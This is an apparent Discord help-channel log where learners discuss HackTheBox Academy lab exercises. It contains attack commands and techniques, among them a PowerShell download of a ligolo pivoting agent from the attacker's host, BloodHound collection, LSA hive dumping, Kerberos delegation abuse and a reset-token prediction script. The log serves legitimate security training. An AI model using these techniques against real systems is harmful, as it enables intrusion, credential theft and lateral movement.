Someone can help me i have a issue for the Repeating Request section on the Using wrb proxys modules, when i do the commande injection and i change the directory there is nothing

dang vpn is crapping out again

performace probs again with EU ?

curl http://10.129.121.59
curl: (52) Empty reply from server

or is it indeted ?

https://academy.hackthebox.com/module/103/section/984

ok pwnbox works, probably vpn

Has anyone completed the Intro to Whitebox Pentesting Skills Assessment? I can get RCE on the test system, but the same payload does nothing on the target. I was just wondering if the target has a WAF that we need to bypass or any other controls?

Hi, I am doing the introduction to assembly and i have an issue in my code assembly code.The objective is the print a string an then prompt a value to the user and then finally print fibonacci sequence. But i have an issue. I don't write to the terminal the string ""Please input max Fn". Any help pls ?

global _start
extern  printf, scanf

section .data
  message db "Please input max Fn",0x0a
  outFormat db "%d",0x0a,0x00
  inFormat db "%d",0x00

section .bss
  userInput resb 1

section .text
_start:
  call printMessage
  call getInput
  call initFib
  call loopFib
  call exit

printMessage:
  mov al, 1; syscall number (write)
  mov dil, 1; set stdout
  mov rsi, message; message to print
  mov dl, 20; set length of the message
  syscall
  ret

getInput:
  mov rdi, inFormat   ; set 1st parameter (inFormat)
  mov rsi, userInput  ; set 2nd parameter (userInput)
  sub rsp, 8
  call scanf
  add rsp, 8
  ret

initFib:
  xor rax, rax
  xor rbx, rbx
  inc bl
  ret

loopFib:
  call printFib
  add rax,rbx
  xchg rax, rbx
  cmp rbx, [userInput]; do rbx - userInput 
  js loopFib; loop if result is < 0
  ret

printFib:
  push rax; save registers to stack before calling function
  push rbx
  mov rdi, outFormat; set printf format
  mov rsi, rbx; set printf digit to print 
  call printf; function call
  pop rbx; restore registers from stack
  pop rax
  ret

exit:
  mov al, 60; syscall number (exit)
  mov dil, 0; exit status
  syscall

Anyone here so friendly to help me out on the skill assessment of HTTP attacks? :)

Hi, I am doing the 'Introduction to XSS Exploitation' section of the 'ADVANCED XSS AND CSRF EXPLOITATION' module. I could not make the xhr requests from the exploit server because CORS has not been set as the browser console told it in an error message (and I can see the same in the HTTP responses).

I found a workaround as ||I've inserted the whole exploit code into the application comment tag so the exploit server was completely skipped and the obtained base64 code of the xhr response was immediately sent to the exfiltration server by normal form submission instead of xhr.|| It worked well but I am not sure that it was the intended way of solving this exercise or I missed something and there was an other way.

BTW as I examined later sections xhr is used everywhere but I don't understand that if CORS headers are not in the HTTP reponse how could any xhr request successed from the exploitserver to the vulnerableserver?

Thanks in advance if someone could give me an answer to this!

can I DM someone for the NOSQL skill 2 assessment?

which has more potential Data Scientist or Ethical Hacking

Interactive Section with Terminal

Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)

what would be the answer

I think it is from module 15 and section 35

dumb question: I used academy a long time ago and thought I recalled each time I would spawn a target machine in a module, it would give me the name of a the ssh user and password to ssh into the machine. now that I'm getting back into academy, when I spawn the target machine I don't see a username/password for ssh so what should I use? I only see the IP address which isn't enough to get on the machine to do the module work

Depends on what the module is, what module are you trying to do?

currently on network enumeration with nmap module but I had the same issue (of not seeing ssh user/password) in the getting starting module

It's not asking you to SSH into this target, it's asking you to use NSE scripts to find the flag which you could do from the pwnbox or your own VM

they are asking you to scan it

so just use the tools from the section

module name and section name are better than module number and section number

for us to help*

good point, no need for ssh on that section. what about this from the getting started section though? to esalate privileges on the nibble machine, I'd need to ssh into it

at this point it suppose to already got foothold in the target

so you are already in

ig the sections in this module are related to each other

all the "nibbles" sections are inter-connected

it must be bugged if that's the case because it sounds like you're saying the ssh user/password would only be provided on the initial foothold section but even that isn't showing a username/password for me. sorry, maybe I'm being really dumb right now but I'm just not seeing the username/password anywhere

yooo don't spoil

escalate privileges means find a way to become root

your initial foothold is as a user

keep it simple , if there's no ssh user/password so you don't need it

you need to find out how to become higher priveleged

(also the sections themselves are pretty much walkthroughs)

okay. sounds like I need to get a reverse shell through some other means for this module rather than sshing into the target

thanks everyone!

yeah that's it

i mean the priv-esc section is after you've already gained some shell access as user

hence: privilege escalation

@winter herald nice name

yeah I think I know how to proceed now, thanks!

appreciate it! not many people probably get the reference

I use this nickname sometimes

considering it's an isolated environment; fucking around and finding out just means you'd have to reset it for yourself and not mess with other users

https://academy.hackthebox.com/module/77/section/844 I am currently working on this module. I was able to ssh into the server and gain access the user2 group and get the user2 flag. I am struggling with how to escalate privilge to gain access to the root flag. I have been able to find and read both the pub and priv rsa keys, but I am not sure if I am on the right track. Can someone help me with some guidance please?

ls -la can be powerful. looking around is a surefire way of finding things

note: ls can be given a filepath i.e. /root/ to have it list that filepath instead of the current working directory

ls -la /file/path

thanks, let me mess around with that a while, would I be doing this as the initial user1? I am assuming not, and wanting to be switched into the user2 group

user2 is the second-to-last step in the chain

you still need to find a way to become root

yes

but user2 can see some interesting files

so looking around is a good idea

can you help me understand the difference between being in group2 as user1 and being user2?

you're overthinking

user1 and user2 are different users

they will see things the other can't

each user/groups got different privileges

depends on the privileges of the user you got , you need to figure out a way to do the priv esc

this one is kinda simple ngl

not for me ngl

i mean i gave you a rather big hint with user2

ls -la around

in the root directory or elsewhere?

keep it simple , you got user 2 so ur next step is root

so look if you can find smtg juicy in the root directory

ok thanks

I am still lost, I apologise. I am in user2 group in the root directory. I ls -la and i have preceeded to cat all the files there. I am not sure what I am looking for, I haven't seen evidence of credentials in these files. We discusses rsa public and private keys earlier but you said I was overthinking, not looking for the answer here, but more clarification I guess surrounding what I am looking for to escalate privilige to the root

the hint on the htb lab says don't forget chmod, which makes me think its about the public key

rsa keys are like credentials

:)

yea, I think I understand that, are you saying I need to grab the private key and use that to ssh in again?

I think

wouldnt hurt to try

if you can grab a users ssh key thats always a win. even if its just for persistence sake

cool I just need to figure out where to put it on my machine lol

you dont need to put it anywhere special

^

the location on your machine doesn't matter for the purposes of using keys

you just need to look up how to use one 🙂

it's as simple as providing a command flag/tag to use it

you guys are amazing

thank you

sometimes , you just need to try ur ideas and see how to apply it

yes, I think I wind up in a self doubt loop sometimes that traps me

^

Do first, question later: worst that can happen in running a command on the target is that you brick it and need to restart it

very true, thank you for the patience

It's great that you help without giving the solution

It fosters critical thinking

yep, it's perfect

Im a huge fan of this. The whole beauty of VMs and instanced labs is you can fuck something up catastrophically and undo the damage like magic. Go wild and break shit on accident now instead of doing it later on a client 😛

Hello! Excuse me, I think that there is a kind of error on the **Lab of Module: XSS > Section: Phishing **

I've just started with the IP target, Iv'e already restarted twice but is the same issue:

There is nothing at the web page! Is this how it should look?

Oh

Break while the only cost is time, not money

I think there's a filepath it wants you to start as like /send.php or something

If anyone has any pointers for the "Introduction to NoSQL Injection" "Skills Assessment II", I'd love to hear it. About ready to fall on my own blade over here.

Yeah... I just notice that lol!
it's at 10.10x.x/phishing
Sorry, I was blind

imagine reading

Hi I'm trying to figure out why my connection to the target is having trouble. I can connect sometimes but will pretty much freeze up after a min if I'm lucky to do anything. is there a way i can get a stable connection my internet connection is 800+Mbps up and down.

I still gave u the name

in india

No you didn't

No idea brother that's something you gotta research on your own

||don't tell me to hit enter||

Have you tried pressing any keys?

(Genuine)

all of them

lol

maybe pivoting make it slow

Potentially lol

I didn't have issues with ligolo and rdp pivots

if I reset the lab , I will need to re-transfer the files

pain

hmmm

it is in Introduction of Academy

Did you do the commands as shown in the section?

ohh i gave u the section of it sorry my bad

ya i did in the terminal

in the parrot terminal

If you're gonna use the reply feature, don't leave the @ on its annoying when I'm already still here

ok

Ttl is a neat thing when dealing with operating systems

what is that

TTL = time to live

Ttl never heard of that thing

wait is that a concept

or u joking ?

same

ya

No, it's how many hops before a packet is discarded

i don't what u r trying to say

Look at the responses of the commands you've run against the target

Note the target is the 10.129.x.x or some variation when you "click here to spawn target"

wait i did not got any target

the instruction said me to write a command in the terminal

you might have to spawn it

wait how can i do it

the instruction told me to write uname -a

in the base terminal

and i got something like SMP PREEMPT_DYNAMIC

well yes that's correct, there are also other things in the output

what are the other answers

Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)

and what will be the answer of this question

look at the output, try/google some of the possible answers

Mr eggplant teach the newcomers how to learn xD

module : active directory enumeration and attacks > priviledges access > Question What other user in the domain has CanPSRemote rights to a host? . can i get the answer from using powershell only? im having a hard time on this one. can anyone help me

You can get the response by using sharphound i think

And bloodhound

Hey does anybody made splunk section in attacking common application module recently. I tried to reach the service that i can see in nmap but i can't curl it or access it with firefox (tried 8000 and 8089 ports)

Try https

Thanks

NMAP TOLD ME BUT I DIDN'T READ

hello , trying to use bloohound-python with pivoting can't get it to work , even that I added the FQDNs to the /etc/hosts
nb: I can request TGTs
any help ?

what's' the command you used

sudo bloodhound-python -u 'user' -p 'password' -ns 172.16.8.3 -d inlanefreight.local -c all

try with -k

Hey, u got any update on this one? Got the same problem with this one 😢

Hi all, I am at the "Getting Started module" in this specific section: https://academy.hackthebox.com/module/77/section/726

When launching the command as example: nmap --script smb-os-discovery.nse -p445 I get the following error, could you please help me?

Host script results:
| smb-os-discovery: 
|_  ERROR: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
Final times for host: srtt: 39317 rttvar: 30744  to: 162293

the same issue , start to think it's problem from the version of bloodhound

the error seems like it's trying to target a machine without ldap open or the ip is wrong

your hosts file is correct?

Thanks for your help. I don't think the IP is incorrect since I can do the other exercices in the section. Regarding LDAP open, I am using a Kali Linux VM on my computer, I will try this thanks

Pm me @errant swift

it looks good

I added the FQDN of the host and the DOMAIN

i wasnt replying to you 😅

weird it's a basic ldap error

reset the target?

or try rusthound

already did few times

or probe it with nxc ldap

wait lemme try ldapsearch

Just wondering, did you also add them to your etc/hosts file ?

yeah , I did

I used the same shiit in the AD module

Alright, I tend to face similar problems. Sometimes I get it to work after 2/3 tries idk why.

ldap is working

reset the target probably, make sure the ip is correct

update bloodhound.py?

I restart my machine and start over lol

but probably need to update it

I got the .zip file using sharphound but it's not compatible with bloodhound so ....

just use an older version

of bloodhound ?

sharphound

okay , I will try

Already done this 3 times, I'm sure the IP is correct because I can do a scan and I can see the port 445 open for SMB, the only thing that doesn't work is the usage of smb-os-discovery.nse script

nvm fixed

Hello help me whu I have a problem with this command

plz

are you sure , your server is UP ?

Hello together,

I have a question about Kerberos delegation.

My understanding of unconstrained delegation:
If unconstrained delegation is activated for a service (e.g. in this case a web server), when a user requests a TGS for this service (web server), his TGT is packed into the service ticket and when this is sent to the web server and unpacked and the TGT contained is stored in the LSASS. The web server can now use the TGT to impersonate the user and request service tickets from the DC on behalf of the user.

If constrained delegation is activated for a web server, the number of services for which the web server can authenticate as any user is limited. (e.g. the web server may only impersonate on SQL server A). I know that i can set this in the AD settings by setting a list to the web server of the services for which it has delegation rights, but my question is how is this implemented on a technical level?

Unfortunately, I have not yet fully understood the resourced-based constrained delegation. A service decides whose objects it trusts and which object is allowed to impersonate and access its resources. Is this correct, and if so, what is the advantage here and how is this implemented on a technical level?

yes

I forget something?

4aa35211f355a1b240b8ce76e1cc7fbc

Finally it didn't work but smbclient did on the same machine so maybe there's a problem with my local install of nmap ? 🤷‍♂️

you can update your nmap, and that script is also not the only thing you can use

any1 having this issue

I am connecting but why I don't success to travel in the directory ??

RBCD is kind of weird. If you have generic-write on a computer (lets say the DC) then you can compromise a SPN (or create a new machine account and make that into one) and add this compromised SPN to the DCs "msDS-AllowedToActOnBehalfOfOtherIdentity". Once you've done that you can do the standard s4u to impersonate the Admin on the DC machine.

It does require you having GenericWrite, GenericAll, WriteProperty, or WriteDACL on the target computer, so its a edge case that you aren't that likely to see

constrained delegation uses the S4U extension,

The S4U2self extension allows a service to obtain a service ticket to itself on behalf of a user.
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/02636893-7a1f-4357-af9a-b672e3e3de13
The Service for User to Proxy (S4U2proxy) extension provides a service that obtains a service ticket to another service on behalf of a user. This feature is known as constrained delegation.
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/bde93b0e-f3c9-4ddf-9f44-e1453be7af5a

RBCD uses the ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity attribute
https://learn.microsoft.com/en-us/windows/win32/adschema/a-msds-allowedtoactonbehalfofotheridentity

Thanks, I already made sure I am in the latest nmap version for linux, but no worries because smbclient did the work, thank you for your help 👍

😦 anyone stuck be sure to check your vpn connection , after being stuck for like 30-40 min I find out I am not connected to VPN

I use the oldest version of sharphound at the end

I think 2.0 should work

it didn't

when you run sharphound it will tell you the min version of bh it's compitable with

didn't know that , I learned a lot from you

Has anyone ever been in a situation where when you ping the command "./agent -connect 10.10.15.122:11601 -ignore-cert" you don't get any response back from ligolo? What do you do in that situation? I tried rebooting my whole machine and that had no effect

Did you add the IP subnet to the route list ?

the target machine address or the internal address on the target machine?

Internal.

You can check that info on the target machine / ligolo session with ifconfig.

Have you already gotten a connection from running the agent on the target?

I think they're saying that the agent is not connecting to the proxy

yes

Yeah, I just read that now

I'd check if the IP and port is correct

and nothing is blocking the connection

^

./agent -connect 10.10.15.122:11601 -ignore-cert

What do you get when you run the agent on the Linux machine?

No connection back.

yooo this windows , not linux

It is a windows target

you need agent.exe

don't laugh

I'm crying

I just felt blud did that on a windows lol

@cedar void if I was you , I will just stop and go two or three steps back

Same result.

Is this first or second pivot ?

Try .\agent.exe might help

Ig it's .\ not ./

doesn't matter for powershell

Yeah that didn't make a difference

is the port number correct? and can the target reach the proxy?

I thought the port number was always the same for ligolo proxys...whichi is 11601

I mean if you need to do it from windows , so probably it will be double pivot

It is the same

so you need to make agent.exe -connect ipofpivothost:port -ignore-cert

.

First pivot?

screen of ipconfig from the windows machine plz ?

you can ping the 10.129.102.151 right ?

Yep .ping 10.129.102.151 1 ⨯
PING 10.129.102.151 (10.129.102.151) 56(84) bytes of data.
64 bytes from 10.129.102.151: icmp_seq=1 ttl=127 time=98.5 ms
64 bytes from 10.129.102.151: icmp_seq=2 ttl=127 time=105 ms
64 bytes from 10.129.102.151: icmp_seq=3 ttl=127 time=100 ms
64 bytes from 10.129.102.151: icmp_seq=4 ttl=127 time=112 ms
64 bytes from 10.129.102.151: icmp_seq=5 ttl=127 time=102 ms
64 bytes from 10.129.102.151: icmp_seq=6 ttl=127 time=158 ms
64 bytes from 10.129.102.151: icmp_seq=7 ttl=127 time=181 ms
64 bytes from 10.129.102.151: icmp_seq=8 ttl=127 time=775 ms
64 bytes from 10.129.102.151: icmp_seq=9 ttl=127 time=132 ms
64 bytes from 10.129.102.151: icmp_seq=10 ttl=127 time=149 ms
64 bytes from 10.129.102.151: icmp_seq=12 ttl=127 time=103 ms
64 bytes from 10.129.102.151: icmp_seq=13 ttl=127 time=109 ms
64 bytes from 10.129.102.151: icmp_seq=14 ttl=127 time=103 ms
64 bytes from 10.129.102.151: icmp_seq=15 ttl=127 time=133 ms
64 bytes from 10.129.102.151: icmp_seq=16 ttl=127 time=105 ms
64 bytes from 10.129.102.151: icmp_seq=17 ttl=127 time=100 ms
64 bytes from 10.129.102.151: icmp_seq=18 ttl=127 time=201 ms
64 bytes from 10.129.102.151: icmp_seq=19 ttl=127 time=736 ms
64 bytes from 10.129.102.151: icmp_seq=20 ttl=127 time=2062 ms
64 bytes from 10.129.102.151: icmp_seq=22 ttl=127 time=101 ms
64 bytes from 10.129.102.151: icmp_seq=23 ttl=127 time=179 ms
^C

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:fc:63:c5 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 84050sec preferred_lft 84050sec
inet6 fe80::a00:27ff:fefc:63c5/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.10.15.122/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::1178/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::eb81:65a3:316:41ea/64 scope link stable-privacy
valid_lft forever preferred_lft forever
4: ligolo: <NO-CARRIER,POINTOPOINT,MULTICAST,NOARP,UP> mtu 1500 qdisc pfifo_fast state DOWN group default qlen 500
link/none

What method did you use to copy the file over?

python htttp.server

powershell wget -Uri http://10.10.15.122:8080/agent.exe -OutFile agent.exe

this might not be important but can you change the dir to users/administrator/Desktop (you’re doing AD assessment 1 right?) and copy over there and try ?

you could also try getting a new agent.exe. Again this is desperate troubleshooting

does VPN work for everyone?

ok nvm it got fixed

i wish there was more tier 2 modules

Anyone who solved preditable reset tokens that are up for assisting me in troubleshooting my Python script? Please let me know.

import time
import requests
import re
from datetime import datetime

# Vulnerable application code.
#<?php
# function generate_reset_token($username) {
#  $time = intval(microtime(true) * 1000);
#  $token = md5($username . $time);
#  return $token;
#}

user = "htbuser"
admin = "htbadmin"
url = "http://IP:58589/question1/"


def generateToken(user, t):

    data = user + str(t)
    token = md5(data.encode()).hexdigest()

    time_obj = datetime.fromtimestamp( ( t / 1000) )
    formatted_time_string = time_obj.strftime("%Y-%m-%d %I:%M:%S%p")

    return "Token generated for: {}: {} @ {} @ miliseconds since epoch: {}".format(user, token, formatted_time_string, t)



# Retrieves the md5 hash of concatted value consisting of htbuser and servertime as well as the time(miliseconds since epoch) used to calculate the hash.

def getUserTokenAndTime():
    try: 
        data = {
            "submit": "htbuser"
        }
        
        res = requests.post(url, data)
        token = re.search(r'<strong>Your token is: (.*?)<\/strong>', res.text).group(1)
        time = re.search(r'created at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[ap]m)', res.text).group(1)

        time_struct = datetime.strptime(time, "%Y-%m-%d %I:%M:%S%p")
        t = int(time_struct.timestamp() * 1000)
    
        print("Token for htbuser: {} @ {} @ miliseconds since epoch {}".format(token, time, t))
        
        return token, time, t

    except Exception as e:
        pass
    

def main():
    
    token, timeCreated, t = getUserTokenAndTime()
    print(generateToken(user, t))
    print(generateToken(admin, t))

main()

Can anybody provide me with a nudge on the Nosql injection skills assessment II ?

This is the output: This is the output: Token for htbuser: b7c4d3d05de3347244eecd1f9b27213a @ 2024-02-27 02:01:33pm @ miliseconds since epoch 1709038893000 (Data from web application) Token generated for: htbuser: 366491095e5ae90f262d95888e37fcd8 @ 2024-02-27 02:01:33PM @ miliseconds since epoch: 1709038893000 Token generated for: htbadmin: c7d586b5509d400380647f1dc55d4f40 @ 2024-02-27 02:01:33PM @ miliseconds since epoch: 1709038893000

how many requests are you sending? the window is +/- 1 seconds so you need to send 2000 requests

dm me

I would expect that If I generate a single request with htbuser and the time stamp provided by the website, I would using my script calculate the same MD5 hash that is given by the server?

Within an interval of +-1 second a token for the htbadmin user will also be created.

what do you think? do you know exactly when the token is created down to the millisecond?

oh - i think I get your point now.

also make sure the timezone is correct, the server is in UTC

I finally completed the Password Attacks Modules (I did all the challenge labs in one day - I had a headache afterwards 😂 ). My DMs are open if anyone needs a hint.

Currently working on Cross-Site(XSS) Session Hijacking. I used the index.php as is in the module. But when I submit the payload doesn't get back the cookie. I do see the server making the get request. Feel free to DM.

@next bronze thanks!!!

Match!
ad526a706fbf152f1a1c3fcc25e6af70```

how to do this

am i supposed to like enter every day and look for highest

ssh2john.py giving me issues. Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)

show the command

I just got the newest one from github and that fixed it for me.

Hello guys i need some help with the Starting Point module vaccine:
i know that ssh is open on 22 on the target machine (10.129.95.174)

22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0ee58077534b00b9165b259569527a4 (RSA)
|   256 ac6e81188922d7a7417d814f1bb8b251 (ECDSA)
|_  256 425bc321dfefa20bc95e03421d69d028 (ED25519)

Since there is a postgres user, and i know the password so i wanted to connect to the target machine by ssh ( since the other shells are pretty unstable)

└─$ ssh postgres@10.129.95.174
Connection closed by 10.129.95.174 port 22

• The vpn works
• I can still connect with sqlmap and nc but the shell is unstable and kicks me out like every 2-3 minutes.
• The writeup does the same (connecting with ssh) and it works

Can someone tell me what i'm missing ?

Can anyone help me with Linux Priv Escalation, i'm in the sudo section

i got it

looking for people to study for OSCP with

hey i'm also facing the same issue ...

ok. i thought thats on me. thanks!

Hello Everyone , hi i need help with the https://academy.hackthebox.com/module/143/section/1278 iam on the question Submit this user's cleartext password. iam really starting to get frustrated i tryed everything i imporsanted the ||tpetty|| user via mimikatz on the target machine ||172.16.6.50 ||and dcynced everything i cannot find a cleartext password . i tryed with dumping the|| lsass.dmp ||file and read it with ||pypykatz ||i tryed with ||secretsdump.py|| and i still didnt get any cleartexgt pw i tryed with cme same there. i dont know what to do anymore. I answered all the questions in the assasment but cant find the cleartext password pls i would need a hint or a nudge on what iam doing wrong or forgetting.

dump lsa/security reg hive, not lsass

thx gonna try that

hello everyone, I have recently started using htb. I am stuck on this section - https://academy.hackthebox.com/module/77/section/843. My task is to find the services on the target web server and then search for its public exploits. I have to use that exploit to get the contents of the file "flag.txt". I am stuck on finding the exploit for a day and half. the question hint says to search for plugin exploits. Can you please give me a hint? I will add the results from nmap scan and gobuster below

Try visiting the webpage

i did that and its about wordpress

Look very closely at the page until it hits you like a ton of bricks

It's pretty simple from there

and also my chat keeps deleting about gobuster and nmap

i will do that, thanks

Yes, as I said, the automod is detecting it as spam

Windows Privilege Escalation - Skill Assessment I - Last Question . im done trying

that last question is to torture the ones who escalated their privileges

is it the ||wordpress database backup rce? ||

Like I said simple

As in literally what's staring you in the face

okay i figured it out

i was being stupid

someone from the community told me not to be afraid to ask my questions so here we go

trump gets relected 2028, ww3 and overpopulation destroy everything and he makes computers illegal, whats first step to make one from scratch in the desert ?

Find a bunch of silicon, copper, and gold

Also this channel isn't the appropriate place to ask

Read #welcome and #rules

ty

and welcome to u too

but we can't make those from scratch ?

And therein lies the problem

erf

I'm not saying welcome ya goon

oops

I'm saying read the welcome and rules channels

i am convinced the whole 6 electrons and stuff is very likely fishy

The question/conversation is off-topic for this channel, which is for assistance with academy modules

Not random ass hypotheticals

they count them with energy calculations and all that but it's simplified, its not actually little balls that can be counted and quantified

oh

This is off-topic

so it's not quote really mental quiet yet

mb

please direct me

.... I did

You just refuse to read

https://tenor.com/view/schnoz-brb-be-right-back-berserk-schnoz-berserk-gif-4193445607831581673

#welcome explains what all the channels are and how to access them

apparently you are facing difficulties understanding simple instructions

you just got son'ed by discord

read the rules , act accordingly

||i understood that it is using a simple backup plugin and that files are stored in a directory called simple-backup in the root folder, but i do not know how to proceed with this information ||

Use searchsploit and/or metasploit

There's only like a small handful of exploits regarding the specific info given

The goal isn't always RCE

i did and i got this as a result from msf ||auxiliary/scanner/http/wp_simple_backup_file_read||

Looks correct to me

Make sure you set the options correctly

i thinbk thats where i am going wrong

I believe you only need to set the RHOST I dont recall if this lab uses a public ip

Well that and one other option

what about filepath and targeturi and rport

If it's on port 80, no changes

Filepath can be interesting

Targeturi is also default

i have set rport to 46228 because my target is 94.237.56.248:46228

hi

filepath is /etc/simple-backup

Incorrect

On the filepath

Look at the file it wants you to grab

:)

Also filepath is including the filename

Not just the directory

so like /etc/simple-backup/flag.txt

Sort of, but you're overthinking it

I believe the question tells you where to look

Remember / is the root of the filesystem

@static roost COMON

ENTER

Please!

i got it😭 thank you so much

marcie u sound very advance

thank for helpin everyone

but who named those roles like that

The roles are tied to the app.hackthebox.com platform

and changed my name too

:👍

Because your name likely contained non-standard characters

guys when im do nmap scan im get filtered problem how i can fix it someone can help me?

wow an elite

Could be a multitude of things

hi

What module/section are you on

me?

vip too

no thats @haughty stirrup

This isn't a gen-chat

wtf

Yes

are u youtube celebrity

brb i go look your website

-Pn -sV -f -script firewall-bypass example

subscrube

and i tried more options

#Module: Kerberos Attacks
#Section: Unconstrained Delegation - Computers
#Sub-Section: Leveraging the Printer Bug

In this subsection it describes using machine account TGTs to craft Silver tickets when the DC spooler service isn't running, but the Silver Tickets section doesn't go over this specific scenario; rather it goes over using the NTLM of the target machine in order to craft STs for its services. I've been attempting to use the TGT of the target machine account (not a Domain Controller) but continue to get Access Denied errors. Basically the attack flow is like this:

1. Acquire Administrator on Unconstrained Delegation host.
2. Run Rubeus in monitor mode.
3. Coerce a Domain joined machine with a running spooler service to authenticate to the Unconstrained Delegation host, storing its TGT in memory.
4. Use the base64 encoded TGT of this machine (not a DC) to request a service ticket to its cifs service and import this ticket into current session.

At this point I am unable to access any shares (confirmed that shares do exist) on the coerced machine using this service ticket (Access Denied). I'm sure i'm missing something here. Any help or pointers would be awesome. Be glad to share more info.

That doesn't tell me what academy module or section you're on

my with my own network?

and generally labs

This channel is for help with academy modules, not homelab stuff

There's a #homelab-sysadm channel, but you have to read and follow #welcome to access it

hello, for the Virtual Hosts section of the infomation gathering am i supposed to use the worldlist from Seclists called namelist.txt under DNS discovery? when i use the list found in the module i get a status code 200 for everything in that list as well as everything in the namelist as well, which is confusing me, some clarity on this would be very much appreciated

Is that the one that asks for domains that have specific flags?

Anyone here so friendly to help me out on the skill assessment of HTTP attacks? :)

If so: you're gonna get a lot of 200s, the filtering comes from the response sizes

i can try

It helps if you provide what you've done and what's not working

If you can do so without spoiling*

Investigating the strange behaviour of Windows Defender that led to a fix

Well, will definitely spoil it if correct..

lol

you being humble

are you trying to access the shares of the machine that you coerced?

If it's correct, then you don't need help

@next bronze correct

dir \\host_name\c$

did you renew the ticket?

Yes. I attempted renewing the ticket as well as explicitely requesting a TGS (asktgs) in Rubeus.

btw how i can earn more cubes for lessons

I'd personally transfer the kirbi out, convert to ccache and try to authenticate from my linux host to make sure it's valid

Participate in ctfs, Participate in the seasons on app.hackthebox.com, buying them, buying a subscription

@next bronze thanks. I'll try that.

and that was successful?

Hi! Currently im doing Documentation and reporting modul. I used hashcat to crack one of the svc admin group user || solarwindsmonitor || and now i dont know what to use to log in with that credentials to the DC01. Can someone please help me with that?

without pay and ctf?

or just it

?

no it was not. Still get access denied.

earn cube

Those are the only ways

Occasionally htb does giveaways for the annual subs

so you can coerce the ticket and see it in rubeus montior, but can't do anything with it?

weird

one day i become so good everybody here wil regrets me

@next bronze exactly. very weird.

but doing the exact same thing against the Domain controller works perfectly.

correct, i noticed that however when i use the list provided by the module the only one that shows is ||app|| and when i use the namelist in the seclist part nothing else shows, when it comes to size i am trying to find how i can filter out based on less then however all i am seeing is filtered by at least size
this the command i am currently using
||ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.htb" -fs 160||

check what acesss the user has, can't remember exactly but maybe try dcsync

-fs is a negative filter

Meaning it won't show responses of that size

hmm I've done a similar thing as this but just turned it into a ccache and it worked, maybe try that

try using both impacket and cme/nxc

is that right?

i see, i will look through the help menu and find the correct one

thank you for the help

Btw they give you an example vhost iirc to maybe use as a type of baseline

yes and it will be too late

trust me ok

yea they use -fs in the example.. i mean i could also use it in the reverse montion xD

you’ve been in this server for 3+ years

yep

I meant above the questions

few know the truth
is fine

and still haven’t figured out how to verify your account

dw wnted

i am confusion on what you mean i will give it a shot rn tho

swweet justice is on the way

again trust

Perhaps the larger response size is the one to filter against

if u watched any movie thats hoiw it go

yes

everytime

thats literally what i am doing rn xD i guess

i just overthought what you said

If you visit the pages that you were getting, you'd see something in common 😉

i got them all at once

used a bash sctipt to output all of them and my kernel was going nuts

i just wish the list was smaller so i dont have to wait on 150k names xD

There's a filter loop btw in the section

And you really only need to run it a minute to see the pattern

let me say u have good pfp and good winner attitude apreciate u being here

you mean the while read loop right?

Yes

and you too macie

thank you kind person, i sometimes use discord for work so gotta keep it professional and i appreciate all the help yall do especially marcie, you are a fucking machine xd

:❤️🥇

i go eat

Np, sometimes it also helps to just ask a question. You can sometimes realize where you fucked up from that

I have potentially a very simple stupid question

The answer is yes

I'm in the NMAP fundamentals module, and am stuck on the question that asks me to get the host name of the target. I've tried running the Nmap scan with DNS resolution, done service scans, verbose logging, etc. and I cannot get a hostname. is there something obvious here I'm missing?

The output of one of those scans gave me a workgroup, but did not give me a host name

Script and version scans can sometimes reveal a host-name

Also reading the output of the scan carefully can help

Hi does anyone know a better tool/method to crack a WiFi password without the need of using numerous wordlists to figure out the right one by chance like in aircrack/wifite? btw I'm using the methods I learn on my own private router

yea the loop i have is smiliar this what i am using
||while IFS= read -r host; do
echo "====================================="
echo "Host: $host"
curl -s -H "Host: $host.inlanefreight.htb" http://10.129.42.195
done < vHosts.txt||

I am an idiot and it was right in front of my face

this channel is for academy modules

thank you

yea unfortuanlly every error i fix brings out a new one xD

Where can I ask my question may I ask?

ey learning opportunities :p

Yeah that's why you're getting the whole request

try in #1024429874246590575

Thx

i add a grep "HTB" to filter it out more

but i only got one and bunch of bad requests so i need to fix up the command again

I mean the simpler way is to use the for loop in conjunction with the other tool

You really only need to get the response/content-size

You don't need the whole page

After that it's finding out the common size and filtering that out

it wont print the whole page tho when i do grep tho all those in the list are the common size already

Which is what the section shows how to do

oh ye

i know what you mean now, i just like torturing myself and doing it the long way

-fs will filter out the size

xD

Meaning you'll only see responses that dont match

that's what i did to get them with ffuf ||ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918||

Aka where the flags are

100x faster than iterating a for-loop

ye

just chose the long way i guess :p

Then it's just sifting that output

¯_(ツ)_/¯

